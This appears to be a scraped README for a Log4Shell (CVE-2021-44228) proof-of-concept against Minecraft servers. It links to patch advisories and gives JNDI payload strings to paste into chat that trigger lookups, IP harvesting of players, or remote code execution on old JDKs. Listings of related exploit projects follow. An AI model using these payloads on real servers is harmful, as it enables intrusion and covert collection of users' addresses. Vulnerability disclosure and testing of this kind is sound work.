Log4J-RCE-Proof-Of-Concept (CVE-2021-44228)

This is a proof of concept of the log4j rce.

Here are some links for the CVE-2021-44228:

This bug affects nearly all log4j2 and maybe log4j1 versions. The recommended version to use is 2.15.0 which fixes the exploit.

Demonstration with minecraft (which uses log4j2)

Details for the impact on minecraft are listed here: https://twitter.com/slicedlime/status/1469150993527017483
Article from minecraft is here: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
Fixed minecraft forge versions: https://twitter.com/gigaherz/status/1469331288368861195
Detailed article from minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
Fixed minecraft fabric versions: https://twitter.com/slicedlime/status/1469192689904193537
Fixed minecraft paper versions: https://twitter.com/aurora_smiles_/status/1469205803232026625
Fixed minecraft spigot versions: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
Fixed minecraft sponge versions: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Lag or sending serialized data

Paste ${jndi:ldap://127.0.0.1/e} in the chat. If there is an open socket on port 389 logj4 tries to connect and blocks further communiction until a timeout occurs.
When using this proof of concept exploit, the log in the console will log THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! which is a serialized string object from the ldap server.

Additionally the malicious ldap server receives every ip address where the message is logged. This means that ip adresses of players on a server can be collected which this exploit.

RCE

Paste ${jndi:ldap://127.0.0.1/exe} in the chat. If -Dcom.sun.jndi.ldap.object.trustURLCodebase=true is set to true the remote code execution will happen.

Fortunately modern jdks disable remote class loading by default. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
Old versions may still allow this!!

Disclaimer

This project is only for educational purposes.

This project will help to test the Log4j CVE-2021-44228 vulnerability.

Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on

Jun 30, 2022

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real

Jun 10, 2022

A proof-of-concept Android application to detect and defeat some of the Cellebrite UFED forensic toolkit extraction techniques.

LockUp An Android-based Cellebrite UFED self-defense application LockUp is an Android application that will monitor the device for signs for attempts

Dec 4, 2022

Slueth(Zipkin) 를 통한 SQS Message Tracing POC(Proof of concept) 입니다.

Sleuth AWS SQS POC 해당 프로젝트는 Slueth(Zipkin) 를 통한 메시지 추적 POC(Proof of concept) 입니다. Rest API 를 통해 POST 요청을 받으면, 메시지를 발행/소비 합니다. 이 과정에서 유지되는 TraceId 를 확인

Nov 29, 2022

Public proof-of-concept obfuscator using the MapleIR framework designed by cts & bibl

Skidfuscator: Obfuscation like never seen before. Join the discord: https://discord.gg/QJC9g8fBU9 🕵️ What is Skidfuscator? Skidfuscator is a proof of

Jan 5, 2023

CVE-2021-2109 && Weblogic Server RCE via JNDI

Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected

Nov 21, 2022

Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions = 2.7.6 With Different Gadgets

The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da

Apr 24, 2022

An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228

evil-rmi-server An evil RMI server that can launch an arbitrary command. May be useful for CVE-2021-44228 in a local privesc scenario Build ./gradlew

Nov 9, 2022

Test case to check if the Log4Shell/CVE-2021-44228 hotfix will raise any unexpected exceptions

Log4Shell Hotfix Side Effect Test Case I wanted to know if any ClassNotFoundException or similar unexpected exception is raised when one applies the C

Nov 9, 2022

Comments

Resource not found error

Recently my server got exploited, so I've decided to test if it's vulnerable by myself. But the remote code execution didn't work, the server throwed an error when object sent. I guess the exploit demo doesn't work properly.

opened by Deathopex 1